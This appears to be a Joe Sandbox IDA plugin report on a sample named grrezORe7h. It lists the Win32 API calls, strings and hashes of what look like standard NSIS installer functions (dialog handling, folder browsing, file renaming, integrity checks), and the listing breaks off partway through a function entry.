Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
Opcode Fuzzy Hash: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58

Function 00403C41 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
ShowWindow.USER32(?), ref: 00403C9A
DestroyWindow.USER32 ref: 00403CAE
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
GetDlgItem.USER32(?,?), ref: 00403CEB
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
IsWindowEnabled.USER32(00000000), ref: 00403D06
GetDlgItem.USER32(?,00000001), ref: 00403DB4
GetDlgItem.USER32(?,00000002), ref: 00403DBE
SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
GetDlgItem.USER32(?,00000003), ref: 00403ECF
ShowWindow.USER32(00000000,?), ref: 00403EF0
EnableWindow.USER32(?,?), ref: 00403F02
EnableWindow.USER32(?,?), ref: 00403F1D
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
EnableMenuItem.USER32(00000000), ref: 00403F3A
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
ShowWindow.USER32(?,0000000A), ref: 004040D6

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
Opcode Fuzzy Hash: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D

Function 004042B6 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
GetDlgItem.USER32(?,000003E8), ref: 00404368
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
GetSysColor.USER32(?), ref: 00404396
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
lstrlenW.KERNEL32(?), ref: 004043B7
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
GetDlgItem.USER32(?,0000040A), ref: 00404432
SendMessageW.USER32(00000000), ref: 00404439
GetDlgItem.USER32(?,000003E8), ref: 00404464
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
SetCursor.USER32(00000000), ref: 004044B8
ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
SetCursor.USER32(00000000), ref: 004044DC
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D

Strings

-B@, xrefs: 004044C2
open, xrefs: 004044C5
N, xrefs: 00404452

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: -B@$N$open
API String ID: 3615053054-1057335957
Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98

Function 0040389E Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458

lstrcatW.KERNEL32(00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420,00441800,00000000,0043F000), ref: 0040391F
lstrlenW.KERNEL32(00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420), ref: 0040399F
lstrcmpiW.KERNEL32(00432E98,.exe,00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
GetFileAttributesW.KERNEL32(00432EA0), ref: 004039BD
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403A06

Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9

RegisterClassW.USER32(00433EA0), ref: 00403A43
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
ShowWindow.USER32(00000005,00000000), ref: 00403AC6
GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
RegisterClassW.USER32(00433EA0), ref: 00403B08
DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27

Strings

_Nb, xrefs: 00403A22, 00403A8A
RichEd20, xrefs: 00403ACC
Control Panel\Desktop\ResourceLocale, xrefs: 004038D2
RichEdit, xrefs: 00403AF9
.exe, xrefs: 004039AC
RichEd32, xrefs: 00403ADA
RichEdit20W, xrefs: 00403AEA, 00403AF0
.DEFAULT\Control Panel\International, xrefs: 0040390A

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1115850852
Opcode ID: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
Opcode Fuzzy Hash: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4

Function 00405D84 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0

Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1

GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
wsprintfA.USER32 ref: 00405DFB
GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
GlobalFree.KERNEL32(00000000), ref: 00405EE4
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB

Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50

Strings

%ls=%ls, xrefs: 00405DF1
NUL, xrefs: 00405D8D
[Rename], xrefs: 00405E65, 00405E77

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$NUL$[Rename]
API String ID: 222337774-899692902
Opcode ID: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
Opcode Fuzzy Hash: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD

Function 004045B4 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404603
SetWindowTextW.USER32(00000000,?), ref: 0040462D
SHBrowseForFolderW.SHELL32(?), ref: 004046DE
CoTaskMemFree.OLE32(00000000), ref: 004046E9
lstrcmpiW.KERNEL32(00432EA0,0042D268,00000000,?,?), ref: 0040471B
lstrcatW.KERNEL32(?,00432EA0), ref: 00404727
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739

Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791

Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
Part of subcall function 004062E9: CharNextW.USER32(0040A300,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373

GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817

Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D

Strings

A, xrefs: 004046D7

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A
API String ID: 2624150263-3554254475
Opcode ID: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
Opcode Fuzzy Hash: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69

Function 00402DEE Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 182COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402DFF
GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,?,00000000,0040353A,?), ref: 00402E1B

Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67

Strings

Null, xrefs: 00402EE5
(*B, xrefs: 00402E7C
soft, xrefs: 00402EDC
Inst, xrefs: 00402ED3
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
Error launching installer, xrefs: 00402E3E

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: (*B$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-2478819026
Opcode ID: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
Opcode Fuzzy Hash: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD

Function 00406077 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 207stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040613A
GetSystemDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061B8
GetWindowsDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061CB
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
SHGetPathFromIDListW.SHELL32(?,00432EA0), ref: 00406215
CoTaskMemFree.OLE32(?), ref: 00406220
lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040629E

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040623E
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406186

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-730719616
Opcode ID: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
Opcode Fuzzy Hash: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D

Function 00403027 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403091
GetTickCount.KERNEL32 ref: 00403138
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403161
wsprintfW.USER32 ref: 00403174

Strings

jA, xrefs: 004031F1
... %d%%, xrefs: 0040316E
jA, xrefs: 004030E7

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: jA$ jA$... %d%%
API String ID: 551687249-2167919867
Opcode ID: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
Opcode Fuzzy Hash: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA

Function 00404180 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040419D
GetSysColor.USER32(00000000), ref: 004041B9
SetTextColor.GDI32(?,00000000), ref: 004041C5
SetBkMode.GDI32(?,?), ref: 004041D1
GetSysColor.USER32(?), ref: 004041E4
SetBkColor.GDI32(?,?), ref: 004041F4
DeleteObject.GDI32(?), ref: 0040420E
CreateBrushIndirect.GDI32(?), ref: 00404218

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1

Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D

Strings

9, xrefs: 00402630

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69

Function 004051B4 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
